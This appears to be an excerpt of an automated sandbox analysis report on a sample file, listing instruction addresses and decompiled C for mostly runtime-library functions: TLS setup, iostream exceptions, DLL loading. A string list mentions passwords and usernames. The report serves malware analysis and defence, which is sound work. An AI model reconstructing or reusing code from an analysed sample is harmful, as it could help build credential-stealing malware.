                                                                                                                              0x0040be84
                                                                                                                              0x0040be86
                                                                                                                              0x0040be88
                                                                                                                              0x0040be8a
                                                                                                                              0x0040be8e
                                                                                                                              0x0040be90
                                                                                                                              0x0040be90
                                                                                                                              0x0040be92
                                                                                                                              0x0040be92
                                                                                                                              0x0040be95
                                                                                                                              0x0040be97
                                                                                                                              0x0040be9f
                                                                                                                              0x0040bea1
                                                                                                                              0x0040bea4
                                                                                                                              0x0040bea4
                                                                                                                              0x0040bea4
                                                                                                                              0x0040bea6
                                                                                                                              0x0040bea9
                                                                                                                              0x0040beab
                                                                                                                              0x0040beae
                                                                                                                              0x0040beb4
                                                                                                                              0x0040beb4
                                                                                                                              0x0040beb7
                                                                                                                              0x0040beb9
                                                                                                                              0x0040bebd
                                                                                                                              0x0040bebf
                                                                                                                              0x0040bec5
                                                                                                                              0x0040bec7
                                                                                                                              0x0040bec7
                                                                                                                              0x0040beca
                                                                                                                              0x0040becc
                                                                                                                              0x0040bed0
                                                                                                                              0x0040bed2
                                                                                                                              0x0040bed4
                                                                                                                              0x0040bed8
                                                                                                                              0x0040bed8
                                                                                                                              0x0040beda
                                                                                                                              0x0040bedd
                                                                                                                              0x0040bedf
                                                                                                                              0x0040bee6
                                                                                                                              0x0040bee8
                                                                                                                              0x0040beea
                                                                                                                              0x0040beee
                                                                                                                              0x0040beee
                                                                                                                              0x0040bef3
                                                                                                                              0x0040befb
                                                                                                                              0x0040befc
                                                                                                                              0x0040befd
                                                                                                                              0x0040bf06
                                                                                                                              0x0040bf0b
                                                                                                                              0x0040bf14

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: String$AllocFree$__wcsicmp$_mbstowcs_memset
                                                                                                                              • String ID: //init_data//%s/*$excluded$name$password$useradded$username
                                                                                                                              • API String ID: 3506673768-3692069674
                                                                                                                              • Opcode ID: 730f99364f1739f502987c62c00373aa9e2c704562d9cea90ce4f172ad9549b6
                                                                                                                              • Instruction ID: 48cdd1465fbc1a52e070db533593888b10d7d14358b0013dd949f6104e3bd17d
                                                                                                                              • Opcode Fuzzy Hash: 730f99364f1739f502987c62c00373aa9e2c704562d9cea90ce4f172ad9549b6
                                                                                                                              • Instruction Fuzzy Hash: 84E13D71A002199FCB14DFA9C881AEFB7B9FF48304F144169E605A7391DB78AD46CBD8
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00420385 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 91%
                                                                                                                              			E00420385(void* __ebx) {
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t7;
				long _t10;
				void* _t11;
				int _t12;
				void* _t18;
				intOrPtr _t21;
				long _t26;
				void* _t30;
				struct HINSTANCE__* _t37;
				void* _t40;
				void* _t42;

				_t30 = __ebx;
				_t37 = GetModuleHandleA("KERNEL32.DLL");
				if(_t37 != 0) {
					 *0x43c15c = GetProcAddress(_t37, "FlsAlloc");
					 *0x43c160 = GetProcAddress(_t37, "FlsGetValue");
					 *0x43c164 = GetProcAddress(_t37, "FlsSetValue");
					_t7 = GetProcAddress(_t37, "FlsFree");
					__eflags =  *0x43c15c;
					_t40 = TlsSetValue;
					 *0x43c168 = _t7;
					if( *0x43c15c == 0) {
						L6:
						 *0x43c160 = TlsGetValue;
						 *0x43c15c = E0042009E;
						 *0x43c164 = _t40;
						 *0x43c168 = TlsFree;
					} else {
						__eflags =  *0x43c160;
						if( *0x43c160 == 0) {
							goto L6;
						} else {
							__eflags =  *0x43c164;
							if( *0x43c164 == 0) {
								goto L6;
							} else {
								__eflags = _t7;
								if(_t7 == 0) {
									goto L6;
								}
							}
						}
					}
					_t10 = TlsAlloc();
					__eflags = _t10 - 0xffffffff;
					 *0x43a8b4 = _t10;
					if(_t10 == 0xffffffff) {
						L15:
						_t11 = 0;
						__eflags = 0;
					} else {
						_t12 = TlsSetValue(_t10,  *0x43c160);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L15;
						} else {
							E00421247();
							 *0x43c15c = E0041FFB9( *0x43c15c);
							 *0x43c160 = E0041FFB9( *0x43c160);
							 *0x43c164 = E0041FFB9( *0x43c164);
							 *0x43c168 = E0041FFB9( *0x43c168);
							_t18 = E00423F31();
							__eflags = _t18;
							if(_t18 == 0) {
								L14:
								E004200D9();
								goto L15;
							} else {
								_push(E00420264);
								_t21 =  *((intOrPtr*)(E00420030( *0x43c15c)))();
								__eflags = _t21 - 0xffffffff;
								 *0x43a8b0 = _t21;
								if(_t21 == 0xffffffff) {
									goto L14;
								} else {
									_t42 = E0041D4C9(1, 0x214);
									__eflags = _t42;
									if(_t42 == 0) {
										goto L14;
									} else {
										_push(_t42);
										_push( *0x43a8b0);
										__eflags =  *((intOrPtr*)(E00420030( *0x43c164)))();
										if(__eflags == 0) {
											goto L14;
										} else {
											_push(0);
											_push(_t42);
											E00420116(_t30, _t37, _t42, __eflags);
											_t26 = GetCurrentThreadId();
											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
											 *_t42 = _t26;
											_t11 = 1;
										}
									}
								}
							}
						}
					}
					return _t11;
				} else {
					E004200D9();
					return 0;
				}
			}
















                                                                                                                              0x00420385
                                                                                                                              0x00420391
                                                                                                                              0x00420395
                                                                                                                              0x004203b5
                                                                                                                              0x004203c2
                                                                                                                              0x004203cf
                                                                                                                              0x004203d4
                                                                                                                              0x004203d6
                                                                                                                              0x004203dd
                                                                                                                              0x004203e3
                                                                                                                              0x004203e8
                                                                                                                              0x00420400
                                                                                                                              0x00420405
                                                                                                                              0x0042040f
                                                                                                                              0x00420419
                                                                                                                              0x0042041f
                                                                                                                              0x004203ea
                                                                                                                              0x004203ea
                                                                                                                              0x004203f1
                                                                                                                              0x00000000
                                                                                                                              0x004203f3
                                                                                                                              0x004203f3
                                                                                                                              0x004203fa
                                                                                                                              0x00000000
                                                                                                                              0x004203fc
                                                                                                                              0x004203fc
                                                                                                                              0x004203fe
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004203fe
                                                                                                                              0x004203fa
                                                                                                                              0x004203f1
                                                                                                                              0x00420424
                                                                                                                              0x0042042a
                                                                                                                              0x0042042d
                                                                                                                              0x00420432
                                                                                                                              0x00420504
                                                                                                                              0x00420504
                                                                                                                              0x00420504
                                                                                                                              0x00420438
                                                                                                                              0x0042043f
                                                                                                                              0x00420441
                                                                                                                              0x00420443
                                                                                                                              0x00000000
                                                                                                                              0x00420449
                                                                                                                              0x00420449
                                                                                                                              0x0042045f
                                                                                                                              0x0042046f
                                                                                                                              0x0042047f
                                                                                                                              0x0042048c
                                                                                                                              0x00420491
                                                                                                                              0x00420496
                                                                                                                              0x00420498
                                                                                                                              0x004204ff
                                                                                                                              0x004204ff
                                                                                                                              0x00000000
                                                                                                                              0x0042049a
                                                                                                                              0x0042049a
                                                                                                                              0x004204ab
                                                                                                                              0x004204ad
                                                                                                                              0x004204b0
                                                                                                                              0x004204b5
                                                                                                                              0x00000000
                                                                                                                              0x004204b7
                                                                                                                              0x004204c3
                                                                                                                              0x004204c5
                                                                                                                              0x004204c9
                                                                                                                              0x00000000
                                                                                                                              0x004204cb
                                                                                                                              0x004204cb
                                                                                                                              0x004204cc
                                                                                                                              0x004204e0
                                                                                                                              0x004204e2
                                                                                                                              0x00000000
                                                                                                                              0x004204e4
                                                                                                                              0x004204e4
                                                                                                                              0x004204e6
                                                                                                                              0x004204e7
                                                                                                                              0x004204ee
                                                                                                                              0x004204f4
                                                                                                                              0x004204f8
                                                                                                                              0x004204fc
                                                                                                                              0x004204fc
                                                                                                                              0x004204e2
                                                                                                                              0x004204c9
                                                                                                                              0x004204b5
                                                                                                                              0x00420498
                                                                                                                              0x00420443
                                                                                                                              0x00420508
                                                                                                                              0x00420397
                                                                                                                              0x00420397
                                                                                                                              0x0042039f
                                                                                                                              0x0042039f

                                                                                                                              APIs
                                                                                                                              • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,0041C6D2), ref: 0042038B
                                                                                                                              • __mtterm.LIBCMT ref: 00420397
                                                                                                                                • Part of subcall function 004200D9: TlsFree.KERNEL32(0000001C,00420504), ref: 00420104
                                                                                                                                • Part of subcall function 004200D9: DeleteCriticalSection.KERNEL32(00000000,00000000,747165A0,00000001,00420504), ref: 00423F95
                                                                                                                                • Part of subcall function 004200D9: DeleteCriticalSection.KERNEL32(0000001C,747165A0,00000001,00420504), ref: 00423FBF
                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004203AD
                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004203BA
                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 004203C7
                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004203D4
                                                                                                                              • TlsAlloc.KERNEL32 ref: 00420424
                                                                                                                              • TlsSetValue.KERNEL32(00000000), ref: 0042043F
                                                                                                                              • __init_pointers.LIBCMT ref: 00420449
                                                                                                                              • __calloc_crt.LIBCMT ref: 004204BE
                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 004204EE
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm
                                                                                                                              • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                              • API String ID: 2125014093-3819984048
                                                                                                                              • Opcode ID: 73ec4538c84e4c6e8ad1bad9037dfc4e87ddf48a8569857180a57fc067b59b41
                                                                                                                              • Instruction ID: 1998cb057dde30ca0566c6a0e0fb795cd46b5fcda0af5077adb67bb75f8afd8c
                                                                                                                              • Opcode Fuzzy Hash: 73ec4538c84e4c6e8ad1bad9037dfc4e87ddf48a8569857180a57fc067b59b41
                                                                                                                              • Instruction Fuzzy Hash: D4318031A043219BEF24BF75BD496077BE0AB05B14B50653BE900E22B3DBB89851EF5C
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00976A28 Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • ___free_lconv_mon.LIBCMT ref: 00976A6C
                                                                                                                                • Part of subcall function 009761EB: _free.LIBCMT ref: 00976208
                                                                                                                                • Part of subcall function 009761EB: _free.LIBCMT ref: 0097621A
                                                                                                                                • Part of subcall function 009761EB: _free.LIBCMT ref: 0097622C
                                                                                                                                • Part of subcall function 009761EB: _free.LIBCMT ref: 0097623E
                                                                                                                                • Part of subcall function 009761EB: _free.LIBCMT ref: 00976250
                                                                                                                                • Part of subcall function 009761EB: _free.LIBCMT ref: 00976262
                                                                                                                                • Part of subcall function 009761EB: _free.LIBCMT ref: 00976274
                                                                                                                                • Part of subcall function 009761EB: _free.LIBCMT ref: 00976286
                                                                                                                                • Part of subcall function 009761EB: _free.LIBCMT ref: 00976298
                                                                                                                                • Part of subcall function 009761EB: _free.LIBCMT ref: 009762AA
                                                                                                                                • Part of subcall function 009761EB: _free.LIBCMT ref: 009762BC
                                                                                                                                • Part of subcall function 009761EB: _free.LIBCMT ref: 009762CE
                                                                                                                                • Part of subcall function 009761EB: _free.LIBCMT ref: 009762E0
                                                                                                                              • _free.LIBCMT ref: 00976A61
                                                                                                                                • Part of subcall function 00975822: RtlFreeHeap.NTDLL(00000000,00000000,?,00976460,?,00000000,?,?,?,0097636B,?,00000007,?,?,00976BE8,?), ref: 00975838
                                                                                                                                • Part of subcall function 00975822: GetLastError.KERNEL32(?,?,00976460,?,00000000,?,?,?,0097636B,?,00000007,?,?,00976BE8,?,?), ref: 0097584A
                                                                                                                              • _free.LIBCMT ref: 00976A83
                                                                                                                              • _free.LIBCMT ref: 00976A98
                                                                                                                              • _free.LIBCMT ref: 00976AA3
                                                                                                                              • _free.LIBCMT ref: 00976AC5
                                                                                                                              • _free.LIBCMT ref: 00976AD8
                                                                                                                              • _free.LIBCMT ref: 00976AE6
                                                                                                                              • _free.LIBCMT ref: 00976AF1
                                                                                                                              • _free.LIBCMT ref: 00976B29
                                                                                                                              • _free.LIBCMT ref: 00976B30
                                                                                                                              • _free.LIBCMT ref: 00976B4D
                                                                                                                              • _free.LIBCMT ref: 00976B65
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627486759.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_950000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 161543041-0
                                                                                                                              • Opcode ID: 68bb27e2cce821860e0a3fbe90df9cb7b53139bb3c64fdc556f9304a4c122c81
                                                                                                                              • Instruction ID: 2bc5db8102f5214eb9143c2f14d07b31b2ec4ec39788b254f83660df6a99f948
                                                                                                                              • Opcode Fuzzy Hash: 68bb27e2cce821860e0a3fbe90df9cb7b53139bb3c64fdc556f9304a4c122c81
                                                                                                                              • Instruction Fuzzy Hash: 86313933604B019FEB65AE39D845B9677E8EF81320F21C42AE05DE7151DBB1ED40C761
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004195DE Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 112libraryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 70%
                                                                                                                              			E004195DE(struct HINSTANCE__* __ecx, CHAR* _a4, intOrPtr _a8, LONG* _a12, signed int _a16, intOrPtr _a20) {
				void* __edi;
				void* __esi;
				struct HINSTANCE__* _t16;
				struct HINSTANCE__* _t19;
				intOrPtr* _t21;
				struct HINSTANCE__* _t22;
				long _t24;
				intOrPtr _t29;
				struct HINSTANCE__* _t30;
				struct HINSTANCE__* _t31;
				struct HINSTANCE__* _t32;
				struct HINSTANCE__* _t33;
				LONG* _t36;
				void* _t38;
				struct HINSTANCE__* _t39;
				intOrPtr* _t40;

				_t31 = __ecx;
				_t29 = 2;
				if( *0x43bef8 != 0) {
					L4:
					_t35 = 1;
					__eflags =  *0x43bef8 - _t35; // 0x1
					if(__eflags != 0) {
						_t16 = _a16;
						__eflags = _t16;
						if(_t16 != 0) {
							L33:
							_push(_t16);
							L17:
							return InterlockedExchange(_a12, ??);
						}
						__eflags =  *0x43a50c - _t16; // 0x0
						if(__eflags != 0) {
							L31:
							_push(_a8);
							_push( *0x43a50c);
							L32:
							_t16 = E0041930E(_t31);
							__eflags = _t16;
							if(_t16 == 0) {
								L16:
								_push(_a20);
								goto L17;
							}
							goto L33;
						}
						_t39 = E00419411(1, _t38);
						__eflags = _t39;
						if(_t39 != 0) {
							_t19 = InterlockedExchange(0x43a50c, _t39);
							__eflags = _t19;
							if(_t19 != 0) {
								FreeLibrary(_t39);
							}
						}
						__eflags =  *0x43a50c;
						if( *0x43a50c == 0) {
							goto L16;
						} else {
							goto L31;
						}
					}
					L5:
					_t21 =  *0x43a510; // 0x4339ac
					while(1) {
						L15:
						_a16 = _t35;
						if(_t21 == 0) {
							goto L16;
						}
						_t40 = _t21;
						_t22 = _a4;
						while(1) {
							_t32 = _t22->i;
							_t31 = _t32;
							__eflags = _t32 -  *_t40;
							if(_t32 !=  *_t40) {
								break;
							}
							__eflags = _t31;
							if(_t31 == 0) {
								L11:
								_t22 = 0;
								L13:
								__eflags = _t22;
								if(_t22 == 0) {
									_t36 = 0x43a50c + _t35 * 8;
									__eflags =  *_t36;
									if( *_t36 == 0) {
										_t30 = LoadLibraryA(_a4);
										__eflags = _t30;
										if(_t30 == 0) {
											__eflags = _a16 - 0xd;
											if(_a16 == 0xd) {
												_t30 = LoadLibraryA("security.dll");
											}
										}
										_t24 = InterlockedExchange(_t36, _t30);
										__eflags = _t24;
										if(_t24 != 0) {
											FreeLibrary(_t30);
										}
									}
									_push(_a8);
									_push( *_t36);
									goto L32;
								}
								_t21 =  *((intOrPtr*)(0x43a510 + _t35 * 8));
								_t35 = _t35 + 1;
								__eflags = _t35;
								goto L15;
							}
							_t33 = _t22->i;
							_t31 = _t33;
							_t3 = _t40 + 1; // 0x656e7265
							__eflags = _t33 -  *_t3;
							if(_t33 !=  *_t3) {
								break;
							}
							_t22 = _t22 + _t29;
							_t40 = _t40 + _t29;
							__eflags = _t31;
							if(_t31 != 0) {
								continue;
							}
							goto L11;
						}
						asm("sbb eax, eax");
						asm("sbb eax, 0xffffffff");
						goto L13;
					}
					goto L16;
				}
				if(E0041930E(_t31, GetModuleHandleA("ntdll.dll"), "LdrUnloadDll") == 0) {
					 *0x43bef8 = _t29;
					goto L4;
				} else {
					_t35 = 1;
					 *0x43bef8 = 1;
					goto L5;
				}
			}



















                                                                                                                              0x004195de
                                                                                                                              0x004195ef
                                                                                                                              0x004195f0
                                                                                                                              0x0041961d
                                                                                                                              0x0041961f
                                                                                                                              0x00419620
                                                                                                                              0x00419626
                                                                                                                              0x004196cb
                                                                                                                              0x004196ce
                                                                                                                              0x004196d0
                                                                                                                              0x0041971f
                                                                                                                              0x0041971f
                                                                                                                              0x00419675
                                                                                                                              0x00419682
                                                                                                                              0x00419682
                                                                                                                              0x004196d2
                                                                                                                              0x004196d8
                                                                                                                              0x00419709
                                                                                                                              0x00419709
                                                                                                                              0x0041970c
                                                                                                                              0x00419712
                                                                                                                              0x00419712
                                                                                                                              0x00419717
                                                                                                                              0x00419719
                                                                                                                              0x00419672
                                                                                                                              0x00419672
                                                                                                                              0x00000000
                                                                                                                              0x00419672
                                                                                                                              0x00000000
                                                                                                                              0x00419719
                                                                                                                              0x004196df
                                                                                                                              0x004196e1
                                                                                                                              0x004196e3
                                                                                                                              0x004196eb
                                                                                                                              0x004196f1
                                                                                                                              0x004196f3
                                                                                                                              0x004196f6
                                                                                                                              0x004196f6
                                                                                                                              0x004196f3
                                                                                                                              0x004196fc
                                                                                                                              0x00419703
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00419703
                                                                                                                              0x0041962c
                                                                                                                              0x0041962c
                                                                                                                              0x0041966b
                                                                                                                              0x0041966b
                                                                                                                              0x0041966d
                                                                                                                              0x00419670
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00419633
                                                                                                                              0x00419635
                                                                                                                              0x00419638
                                                                                                                              0x00419638
                                                                                                                              0x0041963a
                                                                                                                              0x0041963c
                                                                                                                              0x0041963e
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00419640
                                                                                                                              0x00419642
                                                                                                                              0x00419656
                                                                                                                              0x00419656
                                                                                                                              0x0041965f
                                                                                                                              0x0041965f
                                                                                                                              0x00419661
                                                                                                                              0x00419685
                                                                                                                              0x0041968c
                                                                                                                              0x0041968f
                                                                                                                              0x0041969c
                                                                                                                              0x0041969e
                                                                                                                              0x004196a0
                                                                                                                              0x004196a2
                                                                                                                              0x004196a6
                                                                                                                              0x004196af
                                                                                                                              0x004196af
                                                                                                                              0x004196a6
                                                                                                                              0x004196b3
                                                                                                                              0x004196b9
                                                                                                                              0x004196bb
                                                                                                                              0x004196be
                                                                                                                              0x004196be
                                                                                                                              0x004196bb
                                                                                                                              0x004196c4
                                                                                                                              0x004196c7
                                                                                                                              0x00000000
                                                                                                                              0x004196c7
                                                                                                                              0x00419663
                                                                                                                              0x0041966a
                                                                                                                              0x0041966a
                                                                                                                              0x00000000
                                                                                                                              0x0041966a
                                                                                                                              0x00419644
                                                                                                                              0x00419647
                                                                                                                              0x00419649
                                                                                                                              0x00419649
                                                                                                                              0x0041964c
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0041964e
                                                                                                                              0x00419650
                                                                                                                              0x00419652
                                                                                                                              0x00419654
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00419654
                                                                                                                              0x0041965a
                                                                                                                              0x0041965c
                                                                                                                              0x00000000
                                                                                                                              0x0041965c
                                                                                                                              0x00000000
                                                                                                                              0x0041966b
                                                                                                                              0x0041960a
                                                                                                                              0x00419617
                                                                                                                              0x00000000
                                                                                                                              0x0041960c
                                                                                                                              0x0041960e
                                                                                                                              0x0041960f
                                                                                                                              0x00000000
                                                                                                                              0x0041960f

                                                                                                                              APIs
                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll,LdrUnloadDll), ref: 004195FC
                                                                                                                              • InterlockedExchange.KERNEL32(?,?), ref: 00419678
                                                                                                                              • LoadLibraryA.KERNEL32(?), ref: 0041969A
                                                                                                                              • LoadLibraryA.KERNEL32(security.dll), ref: 004196AD
                                                                                                                              • InterlockedExchange.KERNEL32(00000001,00000000), ref: 004196B3
                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 004196BE
                                                                                                                              • InterlockedExchange.KERNEL32(0043A50C,00000000), ref: 004196EB
                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 004196F6
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Library$ExchangeInterlocked$FreeLoad$HandleModule
                                                                                                                              • String ID: LdrUnloadDll$ntdll.dll$security.dll
                                                                                                                              • API String ID: 3965272021-4032047154
                                                                                                                              • Opcode ID: 2432b3fd2c14daee72c141f805a1c3ce4bbac655a9d98354ee7ff641d689411e
                                                                                                                              • Instruction ID: 4130b97ff37819dfa4b85ef7c1037385619234f38a2b3cadedc1ae46028126a9
                                                                                                                              • Opcode Fuzzy Hash: 2432b3fd2c14daee72c141f805a1c3ce4bbac655a9d98354ee7ff641d689411e
                                                                                                                              • Instruction Fuzzy Hash: 30310231200202EBDB218F25ACA4BE73BA9EB55354B151032FA5593260E77CCCD9CB7D
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00414E90 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 69COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 86%
                                                                                                                              			E00414E90(void* __ecx, char* __edx, signed int _a4, char _a8) {
				intOrPtr _v8;
				char _v12;
				char _v40;
				char _v44;
				void* _v84;
				char _v88;
				char _v108;
				char _v112;
				void* _v152;
				char _v156;
				signed int _t30;
				signed int _t34;
				signed char _t48;
				void* _t60;

				_t58 = __edx;
				_push(0xffffffff);
				_push(E00430F48);
				_push( *[fs:0x0]);
				_t30 =  *0x43a6a8; // 0x2a5cd135
				_push(_t30 ^ _t60 - 0x00000088);
				 *[fs:0x0] =  &_v12;
				_t34 = _a4 & 0x00000017;
				 *(__ecx + 8) = _t34;
				_t48 =  *(__ecx + 0xc) & _t34;
				if(_t48 != 0) {
					if(_a8 != 0) {
						E0041ADC6(0, 0);
					}
					_t65 = _t48 & 0x00000004;
					if((_t48 & 0x00000004) != 0) {
						E00401F30( &_v108, "ios_base::badbit set");
						_v8 = 0;
						E00414730(_t58, _t65,  &_v112);
						_t48 =  &_v156;
						_v156 = 0x43365c;
						E0041ADC6(_t48, 0x4384fc);
					}
					_t66 = _t48 & 0x00000002;
					if((_t48 & 0x00000002) != 0) {
						E00401F30( &_v108, "ios_base::failbit set");
						_t58 =  &_v112;
						_v8 = 1;
						E00414730( &_v112, _t66,  &_v112);
						_v156 = 0x43365c;
						E0041ADC6( &_v156, 0x4384fc);
					}
					E00401F30( &_v40, "ios_base::eofbit set");
					_v8 = 2;
					E00414730(_t58, _t66,  &_v44);
					_v88 = 0x43365c;
					_t34 = E0041ADC6( &_v88, 0x4384fc);
				}
				 *[fs:0x0] = _v12;
				return _t34;
			}

















                                                                                                                              0x00414e90
                                                                                                                              0x00414e90
                                                                                                                              0x00414e92
                                                                                                                              0x00414e9d
                                                                                                                              0x00414ea4
                                                                                                                              0x00414eab
                                                                                                                              0x00414eb3
                                                                                                                              0x00414ec0
                                                                                                                              0x00414ec3
                                                                                                                              0x00414ec9
                                                                                                                              0x00414ecb
                                                                                                                              0x00414ed9
                                                                                                                              0x00414edf
                                                                                                                              0x00414edf
                                                                                                                              0x00414ee4
                                                                                                                              0x00414ee7
                                                                                                                              0x00414ef2
                                                                                                                              0x00414f00
                                                                                                                              0x00414f0b
                                                                                                                              0x00414f15
                                                                                                                              0x00414f1a
                                                                                                                              0x00414f22
                                                                                                                              0x00414f22
                                                                                                                              0x00414f27
                                                                                                                              0x00414f2a
                                                                                                                              0x00414f35
                                                                                                                              0x00414f3a
                                                                                                                              0x00414f43
                                                                                                                              0x00414f4e
                                                                                                                              0x00414f5d
                                                                                                                              0x00414f65
                                                                                                                              0x00414f65
                                                                                                                              0x00414f73
                                                                                                                              0x00414f81
                                                                                                                              0x00414f8c
                                                                                                                              0x00414f9b
                                                                                                                              0x00414fa3
                                                                                                                              0x00414fa3
                                                                                                                              0x00414faf
                                                                                                                              0x00414fbd

                                                                                                                              APIs
                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 00414EDF
                                                                                                                                • Part of subcall function 0041ADC6: RaiseException.KERNEL32(?,?,0041ADC5,?,?,?,?,?,0041ADC5,?,00436E98,0043C118), ref: 0041AE06
                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 00414F22
                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 00414F65
                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 00414FA3
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                              • String ID: \6C$\6C$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                              • API String ID: 3476068407-307245345
                                                                                                                              • Opcode ID: 91295f0d235ae2735297eb02c9756877cb93bfc1e8503c652ce0fd435ad6a53a
                                                                                                                              • Instruction ID: 15cbecad142b4c40e25b2c875f8cf597442abb6e7b19b57b48c499f4336be912
                                                                                                                              • Opcode Fuzzy Hash: 91295f0d235ae2735297eb02c9756877cb93bfc1e8503c652ce0fd435ad6a53a
                                                                                                                              • Instruction Fuzzy Hash: 63219EB1118380AFD325DF60C842F9AB7E4AB99704F50C91FF099422D1EBBCA149CB1A
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00420116 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 49libraryloaderCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 87%
